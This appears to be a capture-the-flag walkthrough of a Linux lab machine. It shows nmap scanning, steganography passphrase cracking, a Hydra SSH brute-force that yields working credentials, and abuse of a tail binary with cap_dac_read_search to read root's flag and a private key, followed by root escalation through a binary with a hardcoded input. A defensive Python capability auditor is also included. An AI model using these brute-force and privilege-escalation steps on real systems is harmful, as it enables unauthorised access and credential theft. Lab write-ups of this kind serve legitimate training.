Information gathering

Host discovery

arp-scan -l

Port scanning

┌──(root㉿kali)-[~]
└─# nmap -sV -p- 192.168.254.27 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-27 03:44 EDT
Nmap scan report for 192.168.254.27
Host is up (0.00043s latency).
Not shown: 65533 closed tcp ports (reset)
PORT     STATE SERVICE VERSION
80/tcp   open  http    nginx 1.14.2
2222/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
MAC Address: 08:00:27:5B:90:01 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Port 80

Found two cat images with a hint that something is hidden in them, so I guessed steganography and simply downloaded them all.

┌──(root㉿kali)-[~]
└─# stegseek '/home/kali/Desktop/Untitled'       
StegSeek 0.6 - https://github.com/RickdeJager/StegSeek

[i] Found passphrase: "sexymama"
[i] Original filename: "mateo.txt".
[i] Extracting to "Untitled.out".

┌──(root㉿kali)-[~/cat/1]
└─# stegseek '/home/kali/Desktop/Untitled.jpeg'                                
StegSeek 0.6 - https://github.com/RickdeJager/StegSeek

[i] Found passphrase: "westlife"
[i] Original filename: "markus.txt".
[i] Extracting to "Untitled.jpeg.out".

Found a lot of strings and passwords, but with no one-to-one mapping to users, so I put them into a wordlist and brute-forced.

Matthew
sexymama
markus
Westlife
markuslovesbonita
thisismypassword   > pass.txt

Brute-force with Hydra

┌──(root㉿kali)-[~]
└─# hydra -L  pass.txt -P pass.txt ssh://192.168.254.27:2222 
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-05-26 10:49:17
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 49 login tries (l:7/p:7), ~4 tries per task
[DATA] attacking ssh://192.168.254.27:2222/
[2222][ssh] host: 192.168.254.27   login: mateo   password: thisismypassword
[2222][ssh] host: 192.168.254.27   login: markus   password: markuslovesbonita
1 of 1 target successfully completed, 2 valid passwords found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-05-26 10:49:27

Getting a shell

Since we have already found the users, log in directly over SSH and gather information.

mateo

mateo@twisted:~$ cat note.txt 
/var/www/html/gogogo.wav
Found an audio file that sounds like Morse code. Decoding it with a tool, it turns out to be "fake", a decoy put there to trick you. Tsk.

markus

Found a note.txt that points to an id_rsa; cat cannot read it, so look for another way.

markus@twisted:~$ cat note.txt 
Hi bonita,
I have saved your id_rsa here: /var/cache/apt/id_rsa
Nobody can find it.

Going through the usual enumeration steps, I found that tail can be used:

/usr/sbin/getcap -r / 2>/dev/null
/usr/bin/ping = cap_net_raw+ep
/usr/bin/tail = cap_dac_read_search+ep
This line means that /usr/bin/tail has been given the cap_dac_read_search capability, which lets it skip the file read-permission check; the +ep puts the capability in both the permitted and effective sets, so it actually takes effect. As a result, tail can read files it would otherwise have no permission to access.
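A defender-side check for this finding, added here and not part of the original writeup: a small Python auditor that parses the output of getcap -r and flags capabilities that bypass DAC checks or lead straight to root. The DANGEROUS_CAPS set is my own choice, and the sample output is constructed from the two lines above plus one invented line in the newer libcap output format (assumed to be "path caps" without the " = ").

```python
import re

# Capabilities that let a binary ignore file permissions or become root.
# This set is an assumption for the audit, not an exhaustive list.
DANGEROUS_CAPS = {
    "cap_dac_read_search", "cap_dac_override", "cap_chown", "cap_fowner",
    "cap_setuid", "cap_setgid", "cap_sys_admin", "cap_sys_ptrace",
    "cap_sys_module",
}

# Constructed sample: first two lines are the page's getcap output, the third
# is an invented entry in the newer "path caps" format.
SAMPLE_GETCAP = """/usr/bin/ping = cap_net_raw+ep
/usr/bin/tail = cap_dac_read_search+ep
/usr/bin/python3.7 cap_setuid=ep
"""

def _apply_ops(ops):
    """Fold a cap_to_text op string such as '+ep' or '=p-e' into sorted flags."""
    flags = set()
    for op, letters in re.findall(r"([+=\-])([pie]*)", ops):
        if op == "=":
            flags = set(letters)
        elif op == "+":
            flags |= set(letters)
        else:
            flags -= set(letters)
    return "".join(sorted(flags))

def parse_getcap_line(line):
    """Return (path, {cap_name: flags}) for one getcap line, or None if empty."""
    line = line.strip()
    if not line:
        return None
    if " = " in line:                      # older libcap: "path = caps"
        path, caps = line.split(" = ", 1)
    else:                                  # newer libcap (assumed): "path caps"
        path, caps = line.rsplit(None, 1)
    result = {}
    for clause in caps.split():            # e.g. "cap_a,cap_b+ep"
        m = re.fullmatch(r"([a-z0-9_,]*)((?:[+=\-][pie]*)+)", clause)
        if not m:
            continue
        names = m.group(1).split(",") if m.group(1) else ["all"]  # "=ep" = all caps
        for name in names:
            result[name] = _apply_ops(m.group(2))
    return path, result

def audit_getcap_output(output):
    """Return [(path, cap, flags)] for every permitted/effective dangerous cap."""
    findings = []
    for line in output.splitlines():
        parsed = parse_getcap_line(line)
        if not parsed:
            continue
        path, caps = parsed
        for name, flags in caps.items():
            risky = name in DANGEROUS_CAPS or name == "all"
            if risky and ("e" in flags or "p" in flags):
                findings.append((path, name, flags))
    return findings

if __name__ == "__main__":
    for path, cap, flags in audit_getcap_output(SAMPLE_GETCAP):
        print(f"RISK {path}: {cap}+{flags}")
```

Pipe real output into it with `getcap -r / 2>/dev/null | python3 audit.py` after replacing SAMPLE_GETCAP with sys.stdin.read(); the cap_net_raw entry on ping is correctly left unflagged.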

That means we can use this binary to read sensitive files directly, for example

markus@twisted:/tmp$ tail /root/root.txt
HMVwhereismycat

Privilege escalation

In that case we can also read the contents of the id_rsa file

tail -n 50 /var/cache/apt/id_rsa
This shows the last 50 lines of the file; copy them into a local key file:
vi id_rsa
chmod 600 id_rsa
ssh -i id_rsa bonita@127.0.0.1 -p 2222

Ran beroot, which said it needs root, so I downloaded it for a look. Analysis showed that when the input is 5880 it executes /bin/bash, giving root privileges.

Key takeaways

  1. Using the /usr/sbin/getcap -r / 2>/dev/null command
  2. Reverse-engineering a binary